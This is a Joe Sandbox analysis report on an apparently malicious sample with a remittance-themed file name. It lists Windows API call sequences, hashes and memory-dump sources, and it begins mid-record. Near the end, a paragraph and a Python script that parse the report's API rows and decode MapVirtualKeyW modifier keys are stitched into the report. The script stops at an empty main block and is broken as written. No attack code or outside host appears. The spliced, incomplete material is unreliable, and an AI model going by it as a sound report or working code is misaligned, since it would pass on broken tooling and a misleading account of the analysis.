                                                                      • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                      • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                      Similarity
                                                                      • API ID: Window$Enable$Show$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 1871949834-0
                                                                      • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                      • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                      • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                      • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                      • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                      • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                      • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                      APIs
                                                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                      • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                      • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                      • SendMessageW.USER32 ref: 00471AE3
                                                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                                                      Similarity
                                                                      • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                      • String ID:
                                                                      • API String ID: 3611059338-0
                                                                      • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                      • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                      • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                      • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                      Similarity
                                                                      • API ID: DestroyWindow$DeleteObject$IconMove
                                                                      • String ID:
                                                                      • API String ID: 1640429340-0
                                                                      • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                      • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                      • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                      • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                      APIs
                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                      • _wcslen.LIBCMT ref: 004438CD
                                                                      • _wcslen.LIBCMT ref: 004438E6
                                                                      • _wcstok.LIBCMT ref: 004438F8
                                                                      • _wcslen.LIBCMT ref: 0044390C
                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                      • _wcstok.LIBCMT ref: 00443931
                                                                      Similarity
                                                                      • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 3632110297-0
                                                                      • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                      • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                      • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                      • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                      • String ID:
                                                                      • API String ID: 752480666-0
                                                                      • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                      • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                      • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                      • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                      • String ID:
                                                                      • API String ID: 3275902921-0
                                                                      • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                      • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                      • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                      • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                      • String ID:
                                                                      • API String ID: 3275902921-0
                                                                      • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                      • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                      • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                      • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                      • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                      • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                      • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                      APIs
                                                                      • SendMessageW.USER32 ref: 004555C7
                                                                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                      • String ID:
                                                                      • API String ID: 3691411573-0
                                                                      • Opcode ID: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                      • Instruction ID: ee39a3c17b45488341a0d6beee4a1abd3419bb98b1a9b0cd73eda499273a4889
                                                                      • Opcode Fuzzy Hash: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                      • Instruction Fuzzy Hash: C011B6B12047419BC710DF65EDC8A2A77A8BF18322F10066AFD50DB2D2D779D849C729
                                                                      APIs
                                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                      • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                      • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                      • EndPath.GDI32(?), ref: 004472D6
                                                                      • StrokePath.GDI32(?), ref: 004472E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                      • String ID:
                                                                      • API String ID: 372113273-0
                                                                      • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                      • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                      • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                      • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 0044CC6D
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                      • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                      • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                      • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 0041708E
                                                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                      • __amsg_exit.LIBCMT ref: 004170AE
                                                                      • __lock.LIBCMT ref: 004170BE
                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                      • _free.LIBCMT ref: 004170EE
                                                                      • InterlockedIncrement.KERNEL32(009B2D28), ref: 00417106
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                      • String ID:
                                                                      • API String ID: 3470314060-0
                                                                      • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                      • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                      • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                      • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                        • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3495660284-0
                                                                      • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                      • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                      • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                      • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                      • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                      • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                      • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
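The six MapVirtualKeyW calls in the record above pass the constants 0x5B, 0x10, 0xA0, 0xA1, 0x11 and 0x12 with map type 0, which in winuser.h are VK_LWIN, VK_SHIFT, VK_LSHIFT, VK_RSHIFT, VK_CONTROL and VK_MENU mapped to scan codes (MAPVK_VK_TO_VSC). Resolving exactly the modifier keys is a pattern an analyst wants to spot quickly across hundreds of such records. The script below is an added example, not part of this sandbox report or its tooling: it parses rows in the report's "APIs" format (bullet, name.MODULE, optional argument list, ref address, optional "Part of subcall function" prefix), names the virtual-key and map-type constants, and reports which modifier keys a function resolves. The sample rows are copied from API entries on this page; the function and field names (parse_api_lines, decode_mapvirtualkey, modifier_keys_mapped, ApiCall) are this example's own.

```python
"""Parse Joe Sandbox 'APIs' rows and annotate MapVirtualKeyW virtual-key codes.

Added example, not part of the sandbox report. The sample rows below are
copied from API entries visible in this report; the function and field
names are this example's own.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# One report row looks like one of:
#   • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
#   • DrawMenuBar.USER32 ref: 004485AF
#   • Part of subcall function 00432614: CloseHandle.KERNEL32(...), ref: 00432622
API_LINE = re.compile(
    r"^\s*(?:[•*-]\s*)?"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 virtual-key codes for modifier keys (winuser.h values).
VK_NAMES = {
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
    0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
    0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT",
    0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL",
    0xA4: "VK_LMENU", 0xA5: "VK_RMENU",
}
# uMapType values accepted by MapVirtualKey (winuser.h).
MAP_TYPES = {0: "MAPVK_VK_TO_VSC", 1: "MAPVK_VSC_TO_VK", 2: "MAPVK_VK_TO_CHAR",
             3: "MAPVK_VSC_TO_VK_EX", 4: "MAPVK_VK_TO_VSC_EX"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list = field(default_factory=list)   # raw hex strings; '?' when unresolved
    ref: int = 0                                # address of the call site
    subcall_of: Optional[int] = None            # set for "Part of subcall function" rows


def parse_api_lines(text: str) -> list:
    """Turn report 'APIs' rows into ApiCall records; rows that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def decode_mapvirtualkey(call: ApiCall) -> Optional[tuple]:
    """(vk_name, map_type_name) for a MapVirtualKey* call with constant arguments."""
    if not call.name.startswith("MapVirtualKey") or len(call.args) < 2:
        return None
    try:
        code, maptype = int(call.args[0], 16), int(call.args[1], 16)
    except ValueError:          # '?' means the sandbox could not resolve the value
        return None
    return VK_NAMES.get(code, f"VK_0x{code:02X}"), MAP_TYPES.get(maptype, f"MAPVK_{maptype}")


def modifier_keys_mapped(calls: list) -> set:
    """Names of the modifier keys a function resolves via MapVirtualKey*."""
    names = set()
    for c in calls:
        decoded = decode_mapvirtualkey(c)
        if decoded and decoded[0] in VK_NAMES.values():
            names.add(decoded[0])
    return names


# Sample rows copied from API entries of this report (the last one has no argument list).
SAMPLE = """\
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
• DrawMenuBar.USER32 ref: 004485AF
"""

if __name__ == "__main__":
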